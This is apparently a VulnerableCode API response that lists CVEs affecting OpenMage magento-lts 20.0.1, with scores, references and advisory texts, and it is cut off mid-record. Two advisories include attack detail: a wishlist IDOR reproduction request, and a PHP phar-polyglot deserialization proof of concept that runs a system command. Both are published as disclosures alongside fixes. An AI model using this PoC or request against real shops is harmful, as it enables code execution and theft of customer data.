Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/263752?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/263752?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.1", "type": "composer", "namespace": "openmage", "name": "magento-lts", "version": "20.0.1", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "20.18.0", "latest_non_vulnerable_version": "21.0.0-beta1", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49953?format=api", "vulnerability_id": "VCID-19kk-2s77-nuaa", "summary": "Magento's X-Original-Url header can expose admin url\nThe admin url can be discovered without prior knowledge of its location by exploiting the X-Original-Url header on some configurations.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25523", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0001", "scoring_system": "epss", "scoring_elements": "0.01176", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01403", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.0141", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01409", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25523" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://hackerone.com/bugs?subject=openmage&report_id=3416312", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-04T21:34:33Z/" } ], "url": "https://hackerone.com/bugs?subject=openmage&report_id=3416312" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25523", "reference_id": "CVE-2026-25523", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25523" }, { "reference_url": "https://github.com/advisories/GHSA-jg68-vhv3-9r8f", "reference_id": "GHSA-jg68-vhv3-9r8f", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jg68-vhv3-9r8f" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-jg68-vhv3-9r8f", "reference_id": "GHSA-jg68-vhv3-9r8f", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-04T21:34:33Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-jg68-vhv3-9r8f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73800?format=api", "purl": "pkg:composer/openmage/magento-lts@20.16.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.16.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/955536?format=api", "purl": "pkg:composer/openmage/magento-lts@21.0.0-beta1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@21.0.0-beta1" } ], "aliases": [ "CVE-2026-25523", "GHSA-jg68-vhv3-9r8f" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-19kk-2s77-nuaa" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44328?format=api", "vulnerability_id": "VCID-4tsg-n4v2-vyhg", "summary": "DoS vulnerability in MaliciousCode filter\n### Impact\nInfinite loop in malicious code filter in certain conditions.\n\n### Workarounds\n\nNone", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-23617", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.51012", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50967", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50997", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5095", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.51017", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-23617" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/494027785bdb7db53e60c11ef03c144b61cd3172", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T20:58:57Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/494027785bdb7db53e60c11ef03c144b61cd3172" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T20:58:57Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T20:58:57Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23617", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23617" }, { "reference_url": "https://github.com/advisories/GHSA-3p73-mm7v-4f6m", "reference_id": "GHSA-3p73-mm7v-4f6m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3p73-mm7v-4f6m" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-3p73-mm7v-4f6m", "reference_id": "GHSA-3p73-mm7v-4f6m", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-10T20:58:57Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-3p73-mm7v-4f6m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/63720?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.19", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.19" } ], "aliases": [ "CVE-2023-23617", "GHSA-3p73-mm7v-4f6m", "GMS-2023-153" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4tsg-n4v2-vyhg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89603?format=api", "vulnerability_id": "VCID-66qk-mhwg-tqcz", "summary": "OpenMage LTS: Cross-user wishlist import leads to private option & file disclosure\n# Cross-user wishlist item import via shared wishlist code, leading to private option disclosure and file-disclosure variant\n\n## Summary\n\nThe shared wishlist add-to-cart endpoint authorizes access with a public `sharing_code`, but loads the acted-on wishlist item by a separate global `wishlist_item_id` and never verifies that the item belongs to the shared wishlist referenced by that code.\n\nThis lets an attacker use:\n\n- a valid shared wishlist code for wishlist A\n- a wishlist item ID belonging to victim wishlist B\n\nto import victim item B into the attacker's cart through the shared wishlist flow for wishlist A.\n\nBecause the victim item's stored `buyRequest` is reused during cart import, the victim's private custom-option data is copied into the attacker's quote. If the product uses a file custom option, this can be elevated to cross-user file disclosure because the imported file metadata is preserved and the download endpoint is not ownership-bound.\n\n## Vulnerability Type\n\n- Broken object-level authorization / IDOR\n- Cross-user data disclosure\n- Cross-user file disclosure variant\n\n## Root Cause\n\nIn `app/code/core/Mage/Wishlist/controllers/SharedController.php`, the shared flow does:\n\n```php\n$item = Mage::getModel('wishlist/item')->load($itemId);\n$wishlist = Mage::getModel('wishlist/wishlist')->loadByCode($code);\n...\n$item->addToCart($cart);\n```\n\nRelevant lines:\n\n- `SharedController.php:86` loads the wishlist item by global ID\n- `SharedController.php:87` loads the wishlist by shared code\n- `SharedController.php:99` imports the item into cart\n\nThere is no check that:\n\n```php\n$item->getWishlistId() == $wishlist->getId()\n```\n\nThe safe owner flow in `app/code/core/Mage/Wishlist/controllers/IndexController.php:521-528` does preserve this binding by deriving the wishlist from `item->getWishlistId()`.\n\nThe imported item keeps its original `buyRequest` because `app/code/core/Mage/Wishlist/Model/Item.php:370-372` passes that stored request directly into:\n\n```php\n$cart->addProduct($product, $buyRequest);\n```\n\n## Security Impact\n\n### Baseline impact\n\nAn attacker can import another user's private wishlist item into the attacker's own cart, using an unrelated shared wishlist code.\n\nThis is a clear cross-user authorization bypass. The victim item's private configuration is copied into the attacker's quote, including custom-option values such as personalized text.\n\n### Stronger variant: cross-user file disclosure\n\nIf the victim item contains a custom option of type `file`, the imported quote item preserves file metadata such as:\n\n- `quote_path`\n- `order_path`\n- `secret_key`\n\nThe file option renderer in `app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php:547-552` generates a download URL from:\n\n- the imported `sales/quote_item_option` ID\n- the preserved `secret_key`\n\nThe downloader in `app/code/core/Mage/Sales/controllers/DownloadController.php:150-185`:\n\n- loads quote item option by global ID\n- verifies only product option type and `secret_key`\n- reads the file from `order_path` or `quote_path`\n\nIt does not verify ownership of the quote item, order, or original wishlist item. This creates a cross-user file disclosure path once victim file metadata has been imported.\n\n## Steps To Reproduce\n\n### Lab data\n\n- shared wishlist A:\n - `wishlist_id = 1`\n - `customer_id = 2`\n - `sharing_code = 6376bb8c37a09c2de3664bd8cdc16412`\n- victim wishlist B:\n - `wishlist_id = 2`\n - `customer_id = 3`\n- victim item:\n - `wishlist_item_id = 1`\n - `wishlist_id = 2`\n - `product_id = 2`\n- victim private text option marker:\n - `VICTIM-MARKER-49040822`\n\n### Reproduction\n\nSend:\n\n```http\nGET /wishlist/shared/cart/?code=6376bb8c37a09c2de3664bd8cdc16412&item=1\n```\n\nWhere:\n\n- `code` belongs to shared wishlist A\n- `item=1` belongs to victim wishlist B\n\n### Expected result\n\nThe request should be rejected because the item does not belong to the shared wishlist referenced by the `sharing_code`.\n\n### Actual result\n\nThe application imports victim item `1` into the attacker's quote anyway.\n\n## Verified Evidence\n\n### Baseline variant\n\nPreviously verified at quote/option level in lab:\n\n```text\noption_1 = VICTIM-MARKER-49040822\n```\n\nThis shows that the attacker's cart received victim-private custom-option data from another user's wishlist item.\n\n### File-disclosure variant\n\nPreviously verified in lab after importing a victim file-option payload:\n\n```text\n/sales/download/downloadCustomOption/id/9/key/86fca9b61c0b891b52fb/\n```\n\nThis URL was generated from imported quote item option data containing the victim file metadata and secret key.\n\n## Why This Is A Valid Bug\n\nThis is not a timing issue and does not depend on non-default security settings.\n\nThe bug is a direct authorization failure:\n\n- authorization is based on wishlist A's share code\n- the acted-on object is item B from another wishlist\n- there is no item-to-wishlist binding check\n- victim-controlled item state is then copied into attacker-controlled cart state\n\nThat is a broken object-level authorization issue with clear cross-user impact.\n\n## Remediation\n\nIn `SharedController::cartAction()`, reject any request where the loaded item does not belong to the wishlist loaded from the share code:\n\n```php\n$item = Mage::getModel('wishlist/item')->load($itemId);\n$wishlist = Mage::getModel('wishlist/wishlist')->loadByCode($code);\n\nif (!$item->getId() || !$wishlist->getId() || (int) $item->getWishlistId() !== (int) $wishlist->getId()) {\n return $this->_forward('noRoute');\n}\n```\n\nDefense in depth:\n\n- bind `sales/download/downloadCustomOption` to the current quote/order owner instead of trusting only `id + secret_key`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40098", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05649", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.0569", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05689", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05704", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40098" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/pull/5446", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/pull/5446" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.17.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.17.0" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-665x-ppc4-685w", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T18:10:34Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-665x-ppc4-685w" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40098", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40098" }, { "reference_url": "https://github.com/advisories/GHSA-665x-ppc4-685w", "reference_id": "GHSA-665x-ppc4-685w", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-665x-ppc4-685w" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110814?format=api", "purl": "pkg:composer/openmage/magento-lts@20.17.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.17.0" } ], "aliases": [ "CVE-2026-40098", "GHSA-665x-ppc4-685w" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-66qk-mhwg-tqcz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90111?format=api", "vulnerability_id": "VCID-7srh-wcuk-ryhg", "summary": "OpenMage LTS: Phar Deserialization leads to Remote Code Execution\nPHP functions such as `getimagesize()`, `file_exists()`, and `is_readable()` can trigger deserialization when processing `phar://` stream wrapper paths. OpenMage LTS uses these functions with potentially controllable file paths during image validation and media handling. An attacker who can upload a malicious phar file (disguised as an image) and trigger one of these functions with a `phar://` path can achieve arbitrary code execution.\n\n| Metric | Value | Justification |\n| ------------------------ | --------- | ------------------------------------------------ |\n| Attack Vector (AV) | Network | Exploitable via file upload and web requests |\n| Attack Complexity (AC) | High | Requires file upload + triggering phar:// access |\n| Privileges Required (PR) | None | Some upload vectors don't require authentication |\n| User Interaction (UI) | None | Exploitation is automatic once triggered |\n| Scope (S) | Unchanged | Impacts the vulnerable component |\n| Confidentiality (C) | High | Full system access via RCE |\n| Integrity (I) | High | Arbitrary code execution |\n| Availability (A) | High | Complete system compromise possible |\n\n## Affected Products\n\n- OpenMage LTS versions < 20.16.1\n- All versions derived from Magento 1.x with these code paths\n\n## Affected Files\n\n| File | Line | Vulnerable Function |\n| --------------------------------------------------------- | ---- | ---------------------------------------------- |\n| `app/code/core/Mage/Core/Model/File/Validator/Image.php` | 72 | `getimagesize($filePath)` |\n| `app/code/core/Mage/Cms/Model/Wysiwyg/Images/Storage.php` | 137 | `getimagesize($item->getFilename())` |\n| `lib/Varien/Image.php` | 71 | `$this->_getAdapter()->open($this->_fileName)` |\n\n## Vulnerability Details\n\nPHP's phar (PHP Archive) format stores metadata that is serialized. When PHP's stream wrapper functions access a file using the `phar://` protocol, the metadata is automatically deserialized. This occurs even with seemingly safe functions like `file_exists()` or `getimagesize()`.\n\nA polyglot file can be crafted that is both a valid image (passing initial validation) and a valid phar archive containing malicious serialized objects. When the application later processes this file using `phar://`, the deserialization triggers a gadget chain leading to RCE.\n\n### Attack Flow\n\n1. **Create polyglot file**: Attacker creates a file that is both valid JPEG and valid PHAR\n2. **Upload file**: Attacker uploads the polyglot via product images, CMS media, or import\n3. **Trigger phar:// access**: Attacker causes the application to access the file using `phar://` wrapper\n4. **Code execution**: PHAR metadata deserialization triggers gadget chain\n\n### Proof of Concept\n\n```php\n<?php\n// Create malicious phar file\nclass ExploitGadget {\n public $cmd = 'id > /tmp/pwned';\n function __destruct() {\n system($this->cmd);\n }\n}\n\n$phar = new Phar('exploit.phar');\n$phar->startBuffering();\n$phar->addFromString('test.txt', 'test');\n$phar->setStub('<?php __HALT_COMPILER(); ?>');\n$phar->setMetadata(new ExploitGadget());\n$phar->stopBuffering();\n\n// Rename to appear as image\nrename('exploit.phar', 'exploit.jpg');\n\n// When getimagesize('phar://path/to/exploit.jpg') is called,\n// the ExploitGadget::__destruct() method executes\n```\n\n## Remediation\n\nBlock `phar://` paths before passing to vulnerable functions:\n\n```php\n// Before (vulnerable)\n[$imageWidth, $imageHeight, $fileType] = getimagesize($filePath);\n\n// After (fixed)\nif (str_starts_with($filePath, 'phar://')) {\n throw new Exception('Invalid image path.');\n}\n[$imageWidth, $imageHeight, $fileType] = getimagesize($filePath);\n```\n\nAdditionally, ICO files (which cannot be re-encoded by GD) are now scanned for phar signatures:\n\n- `__HALT_COMPILER();` - Required phar stub\n- `<?php` - PHP opening tag\n- `<?=` - PHP short echo tag\n\nAdditional hardening measures:\n\n1. **ICO uploads removed**: ICO file support is completely removed from new image uploads. This eliminates the polyglot attack vector entirely since all other image formats are re-encoded by GD, which strips any embedded phar metadata.\n\n2. **Phar wrapper disabled**: The `phar://` stream wrapper is unregistered at application bootstrap, preventing any phar deserialization attacks regardless of code path.\n\n3. **Cache deserialization hardening**: All `unserialize()` calls on cached data now use `allowed_classes => false` as defense-in-depth.\n\n**Note:** Existing uploaded ICO files will continue to work. Only new ICO uploads will be rejected. Users are encouraged to use PNG favicons for new uploads.\n\n## Workarounds\n\nIf immediate upgrade is not possible:\n\n1. **Disable phar stream wrapper** (if not needed):\n\n ```ini\n ; php.ini\n disable_functions = phar://\n ```\n\n Or in code:\n\n ```php\n stream_wrapper_unregister('phar');\n ```\n\n2. **Strict upload validation**: Implement additional validation beyond file extension\n\n3. **File storage isolation**: Store uploads outside web root with randomized names\n\n4. **Web Application Firewall**: Block requests containing `phar://` in parameters\n\n\n## Credit\n\nThis vulnerability was discovered and responsibly disclosed by [blackhat2013](https://hackerone.com/blackhat2013) through HackerOne.\n\n## Timeline\n\n- **2025-12-31**: Vulnerability reported via HackerOne\n- **2026-01-21**: Fix developed and tested\n\nSource: https://hackerone.com/reports/3482926", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25524", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00389", "scoring_system": "epss", "scoring_elements": "0.60352", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00389", "scoring_system": "epss", "scoring_elements": "0.60325", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00389", "scoring_system": "epss", "scoring_elements": "0.60342", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00389", "scoring_system": "epss", "scoring_elements": "0.60354", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25524" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.17.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-20T16:44:41Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.17.0" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-fg79-cr9c-7369", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-20T16:44:41Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-fg79-cr9c-7369" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25524", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25524" }, { "reference_url": "https://github.com/advisories/GHSA-fg79-cr9c-7369", "reference_id": "GHSA-fg79-cr9c-7369", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fg79-cr9c-7369" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110814?format=api", "purl": "pkg:composer/openmage/magento-lts@20.17.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.17.0" } ], "aliases": [ "CVE-2026-25524", "GHSA-fg79-cr9c-7369" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7srh-wcuk-ryhg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/52901?format=api", "vulnerability_id": "VCID-87ka-etbj-pfen", "summary": "Cross-Site Request Forgery (CSRF)\nOpenMage LTS before versions 19.4.6 and 20.0.2 allows attackers to circumvent the `fromkey protection` in the Admin Interface and increases the attack surface for Cross Site Request Forgery attacks. This issue is related to Adobe's CVE-2020-9690. It is patched in versions 19.4.6 and 20.0.2.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-15151", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25249", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25141", "published_at": "2026-06-08T12:55:00Z" }, { "value": 